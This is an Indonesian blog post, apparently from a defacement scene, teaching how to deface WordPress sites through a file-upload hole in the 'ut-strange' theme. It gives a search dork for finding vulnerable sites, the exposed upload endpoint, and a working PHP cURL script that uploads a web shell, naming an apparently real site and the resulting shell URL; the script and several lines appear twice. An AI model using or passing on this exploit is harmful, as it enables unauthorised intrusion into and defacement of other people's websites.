Kali ini Saya Akan Membahas Cara Deface dengan Exploit Wordpress Theme Strange File Upload ~_^
Oke Langsung aja ~
Sebenernya caranya Sama kaya Exploit Wp Themes Go-green ~ tapi anu deh lalalala '-')/
Dork ~
Sebenernya caranya Sama kaya Exploit Wp Themes Go-green ~ tapi anu deh lalalala '-')/
Dork ~
inurl:wp-content/themes/ut-strange/
Exploit : /wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php
Vulnerability ~ Blank Page
Code PHP :
<?php
$url = "www.shani-indira.org/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php"; // put URL Here
$post = array
(
"file_upload" => "@chaYankVica.php",
"themeroot" => "."
//,"dir"=>"."
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
Cara Upload Shellnya Gimana sih ? bisa Menggunakan Xampp or Upload Shell via Shell cURL ON ^<^)/
Shell Acces : www.shani-indira.org/wp-content/themes/ut-strange/addpress/includes/chaYankVica.php
<?php
$url = "www.shani-indira.org/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php"; // put URL Here
$post = array
(
"file_upload" => "@chaYankVica.php",
"themeroot" => "."
//,"dir"=>"."
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
Cara Upload Shellnya Gimana sih ? bisa Menggunakan Xampp or Upload Shell via Shell cURL ON ^<^)/
Shell Acces : www.shani-indira.org/wp-content/themes/ut-strange/addpress/includes/chaYankVica.php
Oke Semoga Bermamfaat yh '-')/
Tidak ada komentar:
Posting Komentar